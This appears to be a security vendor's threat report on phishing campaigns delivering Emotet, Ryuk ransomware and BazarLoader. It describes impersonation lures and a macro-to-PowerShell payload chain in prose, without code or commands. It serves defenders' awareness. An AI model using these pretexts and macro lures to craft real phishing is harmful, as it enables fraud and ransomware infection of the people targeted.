This week, Abnormal Security researchers have been tracking recent well-disguised attacks from a Russian criminal enterprise, which are using the Emotet Trojan to drop Ryuk ransomware and BazarLoader for financial gain.
Ryuk ransomware attack
The Federal Bureau of Investigation (FBI) and the Department of Homeland Security (DHS) issued a warning of an impending attack, using Ryuk ransomware, earlier this week, noting that healthcare and the public sector are the intended targets.
Abnormal Security has detected these attacks being launched to a broader array of industries and targets and has identified similar messages, which is detailed below. The attacks are bypassing traditional email security protections, as the payloads are being placed within cloud-based Google Docs and Microsoft Word files.
- Attack #1: Impersonating internal department for financial remittance - The request is from a purported external vendor about a financial remittance. However, the attacker spoofed the vendor’s legitimate domain, which failed authentication. This was done so the target would trust the content of the email and click the link. Abnormal Security also observed a mail rule change, which forked the conversation to an impersonated domain. The sender’s IP originates from a VPN service, based out of Pokrova, in Russia.
- Attack #2: Impersonating external vendor about agreement cancellation - In this example, the attacker is impersonating a vendor and is alerting the target about an end to an agreement. The attacker wants them to click on a Google Doc for compensation details.
- Payload for Attacks #1 and #2: A malware-infected Microsoft Excel spreadsheet posing as a Google Doc - In both cases, the email link leads to a page that automatically downloads a Microsoft Excel attachment that, when opened, will ask the user to ‘Enable Macros’. The downloaded files contain VBA code that runs once ‘Enable Macros/Content’ is selected. The VBA code will then launch a Powershell script, which downloads a payload - a malicious executable file. With this, the attacker can do whatever they choose, typically downloading other malware or performing specific commands.
- Attack #3: Impersonating internal department about the medical report - The email is impersonating an internal contact attempting, so as to send a medical report to a coworker. The main email itself does not contain a lot of content but does include impersonated forwarded information below the request (not shown), to give the appearance of a legitimate thread.
- Microsoft Office Wizard prompting to open on desktop - If the user does not complete the task, a Microsoft Office prompt again asks them to view and edit the document, by clicking ‘Enable Editing’ and ‘Enable Content’.
- Attack #4: Impersonating HR department for a survey - In this example, the email impersonates an internal contact, who is attempting to send an HR survey to a co-worker. The sending domain is not an official email address and the entity is being impersonated.
- Malware-infected survey form on Google Drive - The survey contains links to malware. The attacker is prompting the target to open the documents on desktops, not mobile devices, in order for the attack to be carried out.
- Payload for Attacks #3 and #4: Infected Microsoft Word Doc with Macros - In both cases, the link goes to a Microsoft Word document that asks the target to upgrade their edition to add new features, by clicking ‘Enable Editing’ and ‘Enable Content’. The result is running .exe files that infect the target with malware.
Rise in malware and ransomware attacks
Based on the recent volume, these attacks are becoming more widespread. In each case, the threat actors are convincing the targets to take low consequence actions in order to execute the malware attacks.
In hiding the malware within links and macros inside of Google Docs, and Microsoft Word, the attackers are adding a layer of obfuscation, in order to evade traditional email security protection.